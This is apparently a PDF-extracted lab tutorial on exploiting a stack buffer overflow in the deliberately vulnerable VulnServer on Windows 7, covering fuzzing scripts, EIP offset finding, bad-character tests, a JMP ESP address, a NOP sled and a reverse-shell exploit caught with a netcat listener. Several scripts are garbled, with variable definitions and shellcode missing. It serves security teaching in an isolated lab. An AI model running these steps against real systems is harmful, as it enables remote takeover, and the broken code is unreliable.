Exploiting - Vulnerable Server - For Windows 7
Exploiting - Vulnerable Server - For Windows 7
WARNING
VulnServer is unsafe to run. The Windows 7 machine will be vulnerable to compromise. I recommend performing this project on virtual machines with NAT networking
mode, so no outside attacker can exploit your windows machine.
Overview
This project guides you through all the steps of developing a Windows exploit, using a program that deliberately has a simple buffer overflow vulnerability.
http://sites.google.com/site/lupingreycorner/vulnserver.zip
A "vulnserver" window opens. Double-click vulnserver. The Vulnserver application opens, as shown below.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 2 of 33
Turn off the firewall for both private and public networks.
nc 192.168.119.129 9999
You should see a banner saying "Welcome to Vulnerable Server!", as shown below.
Type HELP and press Enter. You see a lot of commands. None of these actually do anything useful, but they do take input and process it.
This server has many vulnerabilities, but the one we'll use now is in the TRUN command.
On your Kali Linux machine, in the Terminal window, type TRUN .AAA and press Enter.
On your Kali Linux machine, in the Terminal window, type EXIT and press Enter to close your connection to Vulnerable Server.
nano vs-fuzz1
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 3 of 33
In the nano window, type or paste this code. This is a simple Python script that does the same thing you just did--it connects to the server and executes a TRUN command
with a specified number of "A" characters.
#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack length ", length, ' to TRUN .'
attack = 'A' * length
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:
./vs-fuzz1
Run the fuzzer again, but this time enter a length of 9000.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 4 of 33
Try other lengths. You will find that it crashes for lengths of both 2000 and 3000. Each time it crashes, restart the server.
http://debugger.immunityinc.com/ID_register.py
Click the Download button. Save the file. The file is 22.7 MB in size.
When the download completes, double-click the ImmunityDebugger_1_85_setup file and install the software with the default options. It will also install Python.
Make your Windows desktop large, and drag the borders of the panes so you can see all four of them, as shown below.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 5 of 33
Now we will attach a running process to Immunity. That will encapsulate the process inside Immunity, so Immunity can examine and control the process.
In the "Select process to attach" box, click vulnserver, as shown below, and click the Attach button.
To make the text more readable, position the mouse pointer somewhere in the top left pane and right-click.
In the context menu, click Appearance, "Font (all)", "OEM fixed font", as shown below.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 6 of 33
In the lower left pane, right-click and click Hex, "Hex/ASCII (16 bytes)", as shown below.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 7 of 33
Locate these items in your Immunity window, as marked in the image below.
Status in the lower right corner: this shows if the program is Paused or Running. When Immunity attaches a process, the process starts in the Paused state.
Current Instruction in the lower left: this shows exactly which instruction the process is executing right now. Immunity has automatically assigned a breakpoint at the
start of the process and right now its execution has paused there.
Registers in the upper right: The most important items here are:
• EIP: the Extended Instruction Pointer is the address of the next instruction to be processed.
• ESP: the Extended Stack Pointer is the top of the stack
• EBP: the Extended Base Pointer is the bottom of the stack
Assembly Code in the upper left: This is the most difficult part of the window to understand. It shows the processor instructions one at a time in "Assembly Language",
with instructions like MOV and CMP. Assembly language is difficult to learn, but you don't need to learn much of it to develop simple exploits. Don't struggle much with
this pane at first.
Hex Dump at the lower left: this shows a region of memory in hexadecimal on the left and in ASCII on the right. For simple exploit development, we'll use this pane to
look at targeted memory regions, usually easily labelled with ASCII text.
Stack in the lower right. This shows the contents of the Stack, but it's presented in a way that is not very helpful for us right now. For this project, disregard this pane.
If you are ready to learn more about these panes and their contents, see the "Debugging Fundamentals for Exploit Development" tutorial in the "Sources" section at the
bottom of this project.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 8 of 33
./vs-fuzz1
On your Windows 7 machine, in the Immunity window, at the lower left, you see "Access violation when writing to [41414141], as shown below.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 9 of 33
"41" is the hexadecimal code for the "A" character, as shown below.
This means that the 'A' characters you sent were somehow misinterpreted by the server as an address to write data to. Addresses are 32 bits long, which is 4 bytes, and 'A' is
41 in hexadecimal, so the address became 41414141.
This is a vulnerability that could be exploited, but it's not the sort of vulnerability to start with.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 10 of 33
On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator".
Verify that the status in the lower right corner is "Running", as shown below.
./vs-fuzz1
On your Windows 7 machine, in the Immunity window, at the lower left, you see "Access violation when executing [41414141], as shown below.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 11 of 33
This is a classic buffer overflow exploit--the injected characters are placed into the EIP when a subroutine returns, so they become the address of the next instruction to be
executed.
41414141 is not a valid address, so Immunity detects that the program is crashing and pauses so you can see what's happening.
This is common in exploit development--an attack of one length has different results than an attack of a different length.
From now on, we'll use a length of 3000 for all attacks.
On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator". In the User Account Control box, click Yes.
nano vs-eip0
In the nano window, type or paste this code. This is a simple Python script creates a simple pattern of four-byte sequences and prints it out so you can see it.
#!/usr/bin/python
chars = ''
for i in range(0x30, 0x35):
for j in range(0x30, 0x3A):
for k in range(0x30, 0x3A):
chars += chr(i) + chr(j) + chr(k) + 'A'
print chars
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 12 of 33
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:
./vs-eip0
As you can see, the pattern is simple--a three digit number followed by 'A'.
There are 500 groups of 4 characters, from 000A to 499A, for a total of 2000 bytes.
nano vs-eip1
This will send a 3000-byte attack to the server, consisting of 1000 'A' characters followed by the 2000-byte nonrepeating pattern.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 13 of 33
#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:
./vs-eip1
The lower left corner of the Immunity window now says "Access violation when executing [35324131]", as shown below.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 14 of 33
Hex Character
--- ---------
35 5
32 2
41 A
31 1
So the characters are '52A1'. However, Intel processors are "Little Endian", so addresses are inserted in reverse order, so the actual characters that were placed into the EIP
were '1A25'.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 15 of 33
That's this portion of the input string (with spaces added again, for clarity):
The pattern '1A25' occurs after 251 four-byte fields + 2 more bytes, or 251 x 4 + 2 = 1004 + 2 = 1006 bytes.
Our attack used 1000 'A' characters before the nonrepeating pattern, so the EIP contains the four bytes after the first 2006 bytes in the attack.
On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator". In the User Account Control box, click Yes.
nano vs-eip2
This program will send a 3000-byte attack to the server, consisting of 2006 'A' characters followed by 'BCDE' which should end up in the EIP, and enough 'F' characters to
make the total 3000 bytes long.
#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 16 of 33
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:
./vs-eip2
The lower left corner of the Immunity window now says "Access violation when executing [45444342]", as shown below.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 17 of 33
In the upper right pane of Immunity, left-click the value to the right of ESP, so it's highlighted in blue, as shown below.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 18 of 33
Look in the lower left pane of Immunity. It's full of the 'F' characters we put at the end of the exploit text. That's going to be very important later--we'll put our exploit code
here.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 19 of 33
On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator". In the User Account Control box, click Yes.
Just from common sense, one might expect these characters to cause trouble:
Not all these characters are always bad, and there might be other bad characters too. So the next task is to try injecting them and see what happens.
nano vs-badchar1
This program will send a 3000-byte attack to the server, consisting of 2006 'A' characters followed by 'BCDE' which should end up in the EIP, then all 256 possible
characters, and finally enough 'F' characters to make the total 3000 bytes long.
#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 20 of 33
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:
./vs-badchar1
The lower left corner of the Immunity window says "Access violation when executing [45444342]" again.
To see if the characters we injected made it into the program or not, we need to examine memory starting at ESP.
In the upper right pane of Immunity, left-click the value to the right of ESP, so it's highlighted in blue, as shown below.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 21 of 33
Look in the lower left pane of Immunity. The first byte is 00, but none of the other characters made it into memory, not the other 255 bytes or the 'F' characters. That
happened because the 00 byte terminated the string. '\x00' is a bad character.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 22 of 33
On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator". In the User Account Control box, click Yes.
nano vs-badchar2
This program skips the null byte, and includes all the other 255 bytes in the attack string, before the 'F' characters.
#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 23 of 33
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:
./vs-badchar2
In the upper right pane of Immunity, left-click the value to the right of ESP, so it's highlighted in blue.
All the bytes from 01 to FF appear in order, followed by 'F' characters (46 in hexadecimal).
There are two simple instructions that will work: "JMP ESP" and the two-instruction sequence "PUSH ESP; RET".
To find these instructions, we need to examine the modules loaded when Vulnerable Server is running.
Installing MONA
MONA is a python module which gives Immunity the ability to list modules and search through them.
On your Windows machine, open Internet Explorer, and open this page:
http://redmine.corelan.be/projects/mona
In the "Download" section, right-click the "here"link below, and click "Save Target As". Save the file in your Downloads folder.
mona.7z
On the taskbar, click the yellow folder icon to open Windows Explorer. Navigate to your Downloads folder. Right-click mona and click Copy, as shown below.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 24 of 33
A box pops up saying "You'll need to provide administrator permission...". Click Continue.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 25 of 33
On your Windows desktop, right-click "Immunity Debugger" and click "Run as Administrator". In the User Account Control box, click Yes.
Don't click the "Run" button yet--it's easier to use Mona with the program Paused.
!mona modules
Right-click an empty portion of the window and click Appearance, Font, "OEM Fixed Font, as shown below.
This chart shows all the modules loaded as part of Vulnerable Server, and several important properties for each one.
The property of most importance to us now is ASLR, which causes the address of the module to vary each time it is restarted.
Another property that can cause trouble is "Rebase", which relocates a module if another module is already loaded in its preferred memory location.
To make the most reliable exploit, we want to use a module without ASLR or Rebase.
There are two modules with "False" in both the Rebase and ASLR columns: essfunc.dll and vulnserver.exe.
However, notice the address values at the left of the chart--vulnserver.exe is loaded at very low address values, starting with 0x00, so any reference to addresses within
vulnserver.exe will require a null byte, and that won't work because '\x00' is a bad character.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 26 of 33
locate nasm_shell
The utility is located in a metasploit-framework directory, as shown below.
Once nasm starts, type JMP ESP and press Enter to convert it to hexadecimal codes, as shown below.
The hexadecimal code for the two-instruction sequence "POP ESP; RET" is 5CC3.
If we can find either of those byte sequences in essfunc.dll, we can use them to run our exploit.
625011af
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 27 of 33
Now you should see the normal view, which is the "CPU window", as shown below.
Click the "Run" button. The Status at the lower right should say "Running", as shown below.
That will start executing code at the location ESP points to.
Just to test it, we'll put some NOP instructions there ('\x90' = No Operation -- they do nothing) followed by a '\xCC' INT 3 instruction, which will interrupt processing.
The NOP sled may seem unimportant, but it's needed to make room to unpack the Matasploit packed exploit code we'll make later.
nano vs-eip3
#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 28 of 33
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:
./vs-eip3
The lower left corner of the Immunity window now says "INT 3 command", as shown below.
In the upper right pane of Immunity, left-click the value to the right of ESP, so it's highlighted in blue.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 29 of 33
The lower left pane shows the NOP sled as a series of 90 bytes, followed by a CC byte.
Don't bother to use the debugger now--if everything is working, the exploit will work on the real server.
nano vs-shell
#!/usr/bin/python
import socket
server = '192.168.119.129'
sport = 9999
)
padding = 'F' * (3000 - 2006 - 4 - 16 - len(exploit))
attack = prefix + eip + nopsled + exploit + padding
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 30 of 33
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
ifconfig
Find your Kali machine's IP address and make a note of it.
On your Kali Linux machine, in a Terminal window, execute the command below.
Replace the IP address with the IP address of your Kali Linux machine.
The exploit is encoded to avoid null bytes. because '\x00' is a bad character.
Use the mouse to highlight the exploit code, as shown below. Right-click the highlighted code and click Copy.
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 31 of 33
nano vs-shell
Use the down-arrow key to move the cursor into the blank line below this line:
exploit = (
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 32 of 33
To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.
Next you need to make the program executable. To do that, in Kali Linux, in a Terminal window, execute this command:
Starting a Listener
On your Kali Linux machine, open a new Terminal window and execute this command:
nc -nlvp 443
This starts a listener on port 443, to take control of the Windows target.
./vs-shell
In Kali Linux, the other Terminal window shows a Windows prompt, as shown below. You now control the Windows machine!
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021
Exploiting "Vulnerable Server" for Windows 7 Page 33 of 33
Sources
Debugging Fundamentals for Exploit Development
Introducing Vulnserver
MinHook - The Minimalistic x86/x64 API Hooking Library (Good JMP Examples)
Msfpayload
file:///C:/Users/sosoe/AppData/Local/Temp/7XZFVNGA.htm 4/29/2021